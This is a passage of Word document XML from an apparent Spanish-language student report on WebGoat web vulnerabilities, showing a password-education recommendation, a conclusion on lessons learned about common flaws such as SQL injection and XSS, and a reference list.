          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Educación al usuario</w:t>
      </w:r>
      <w:r w:rsidR="00992664">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CB0F06" w14:textId="348A18CE" w:rsidR="00992664" w:rsidRDefault="0026103B" w:rsidP="00992664">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Asegurarse de que los usuarios comprendan los riesgos de contraseñas </w:t>
      </w:r>
      <w:r w:rsidR="00087D1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>débiles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, proveer generadores de contraseñas seguras dentro de la aplicación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E56BCF" w14:textId="733F3EE0" w:rsidR="00087D1C" w:rsidRDefault="00087D1C" w:rsidP="00087D1C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5C085E" w14:textId="1D37DF74" w:rsidR="00087D1C" w:rsidRDefault="00087D1C" w:rsidP="00087D1C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0384304C" w14:textId="77777777" w:rsidR="00655C40" w:rsidRDefault="00655C40" w:rsidP="00087D1C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61215C45" w14:textId="013D8E35" w:rsidR="00087D1C" w:rsidRPr="00655C40" w:rsidRDefault="00087D1C" w:rsidP="00087D1C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31853C61" w14:textId="77777777" w:rsidR="00655C40" w:rsidRPr="00236C10" w:rsidRDefault="00655C40" w:rsidP="00655C40">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F02AA72" w14:textId="79256465" w:rsidR="00236C10" w:rsidRDefault="00236C10" w:rsidP="00236C10">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A896596" w14:textId="4B6E9FB4" w:rsidR="00236C10" w:rsidRDefault="00236C10" w:rsidP="00236C10">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El análisis de las vulnerabilidades identificadas en WebGoat me han permitido adquirir una comprensión practica de los riesgos </w:t>
      </w:r>
      <w:r w:rsidR="00655C40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>más</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> comunes en las aplicaciones we</w:t>
      </w:r>
      <w:r w:rsidR="00655C40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. A </w:t>
      </w:r>
      <w:r w:rsidR="00655C40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>través</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la exploración de fallos como </w:t>
      </w:r>
      <w:r w:rsidR="00655C40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Inyección</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL, Cross-Site Scripting (XSS), Security Misconfiguration, Componentes Vulnerables y Desactualizados, Fallos en Identidad y </w:t>
      </w:r>
      <w:r w:rsidR="00655C40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Autenticación</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Contraseñas Seguras)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, se han destacado no solo las debilidades técnicas sino </w:t>
      </w:r>
      <w:r w:rsidR="00655C40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>también</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> los impactos críticos que estas vulnerabilidades pueden tener en entornos empresariales reales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5A0127" w14:textId="70EAF3D8" w:rsidR="00236C10" w:rsidRDefault="00236C10" w:rsidP="00236C10">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00999049" w14:textId="25039486" w:rsidR="00236C10" w:rsidRDefault="00D22E17" w:rsidP="00236C10">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Este aprendizaje ha reforzado la importancia de adoptar una mentalidad proactiva en Ciberseguridad, integrando buenas practicas en cada etapa del ciclo de la vida y del desarrollo de software. </w:t>
      </w:r>
      <w:r w:rsidR="001A65C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Además</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, subraya la necesidad de mantener los </w:t>
      </w:r>
      <w:r w:rsidR="001A65C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sistemas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> actualizados, implementar </w:t>
      </w:r>
      <w:r w:rsidR="00655C40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">controles adecuados y realizar pruebas </w:t>
      </w:r>
      <w:r w:rsidR="001A65C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>periódicas</w:t>
      </w:r>
      <w:r w:rsidR="00655C40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EBBE1A" w14:textId="4EE8D265" w:rsidR="00655C40" w:rsidRDefault="00655C40" w:rsidP="00236C10">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54DC5C8F" w14:textId="12A5A651" w:rsidR="00655C40" w:rsidRPr="00236C10" w:rsidRDefault="00655C40" w:rsidP="00236C10">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">La experiencia obtenida en este proyecto aporta una base solida para avanzar en mi carrera en TI, fomentando un enfoque ético y responsable hacia la seguridad informática. Este conocimiento es esencial para garantizar la integridad, confidencialidad y disponibilidad de los </w:t>
      </w:r>
      <w:r w:rsidR="00387044">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sistemas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el ámbito organizacional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F1769" w14:textId="3441EC0A" w:rsidR="00236C10" w:rsidRDefault="00236C10" w:rsidP="00236C10">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60090DC1" w14:textId="77777777" w:rsidR="00236C10" w:rsidRPr="00236C10" w:rsidRDefault="00236C10" w:rsidP="00236C10">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E16D26E" w14:textId="17B1EDAA" w:rsidR="00087D1C" w:rsidRPr="001A6F1A" w:rsidRDefault="00087D1C" w:rsidP="00087D1C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>REFERENCIAS</w:t>
      </w:r>
      <w:r w:rsidR="003617F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Y BIBLIOGRAFIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF755AC" w14:textId="0F3A53DF" w:rsidR="001A6F1A" w:rsidRDefault="001A6F1A" w:rsidP="001A6F1A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF858B6" w14:textId="3957AE6D" w:rsidR="001A6F1A" w:rsidRDefault="001A6F1A" w:rsidP="001A6F1A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">WebGoat - Herramienta de aprendizaje utilizada para simular y explotar vulnerabilidades comunes. Disponible en: </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00060AC3">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-webgoat/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7BC47D1D" w14:textId="77777777" w:rsidR="001A6F1A" w:rsidRPr="001A6F1A" w:rsidRDefault="001A6F1A" w:rsidP="001A6F1A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71700F30" w14:textId="166A455F" w:rsidR="001A6F1A" w:rsidRDefault="001A6F1A" w:rsidP="001A6F1A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>OWASP Top 10 (2021). "Guía de las vulnerabilidades más críticas en aplicaciones web". Disponible en: https://owasp.org/www-project-top-ten/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F40723" w14:textId="77777777" w:rsidR="001A6F1A" w:rsidRPr="001A6F1A" w:rsidRDefault="001A6F1A" w:rsidP="001A6F1A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="730392CE" w14:textId="3DD18104" w:rsidR="001A6F1A" w:rsidRDefault="001A6F1A" w:rsidP="001A6F1A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Documentación y foros de Docker: "Ejecución de aplicaciones en contenedores para entornos controlados". Disponible en: https://www.docker.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294F456E" w14:textId="77777777" w:rsidR="001A6F1A" w:rsidRPr="001A6F1A" w:rsidRDefault="001A6F1A" w:rsidP="001A6F1A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B23D81A" w14:textId="735668C8" w:rsidR="001A6F1A" w:rsidRDefault="001A6F1A" w:rsidP="001A6F1A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"OWASP Testing Guide v4". Fundación OWASP. Manual completo sobre pruebas de penetración en aplicaciones web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FEC295" w14:textId="77777777" w:rsidR="001A6F1A" w:rsidRPr="001A6F1A" w:rsidRDefault="001A6F1A" w:rsidP="001A6F1A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5926539B" w14:textId="4CE8ED1E" w:rsidR="001A6F1A" w:rsidRDefault="001A6F1A" w:rsidP="001A6F1A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Consultas previas realizadas con ChatGPT en relación con WebGoat y la explotación de vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDD7B08" w14:textId="77777777" w:rsidR="001A6F1A" w:rsidRPr="001A6F1A" w:rsidRDefault="001A6F1A" w:rsidP="001A6F1A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB045A3" w14:textId="2E624C62" w:rsidR="001A6F1A" w:rsidRPr="001A6F1A" w:rsidRDefault="001A6F1A" w:rsidP="001A6F1A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Apuntes y lecturas complementarias sobre ciberseguridad obtenidas en cursos y recursos abiertos como Coursera y edX.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198DBC55" w14:textId="77777777" w:rsidR="00E551EE" w:rsidRPr="00E551EE" w:rsidRDefault="00E551EE" w:rsidP="00E551EE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63C71878" w14:textId="77777777" w:rsidR="00A8151B" w:rsidRPr="00A8151B" w:rsidRDefault="00A8151B" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75200F84" w14:textId="5500137E" w:rsidR="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CA10062" w14:textId="77777777" w:rsidR="00934311" w:rsidRPr="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00934311" w:rsidRPr="00934311">
      <w:headerReference w:type="default" r:id="rId3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A1E0C" w14:textId="77777777" w:rsidR="00F36949" w:rsidRDefault="00F36949" w:rsidP="006266EC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
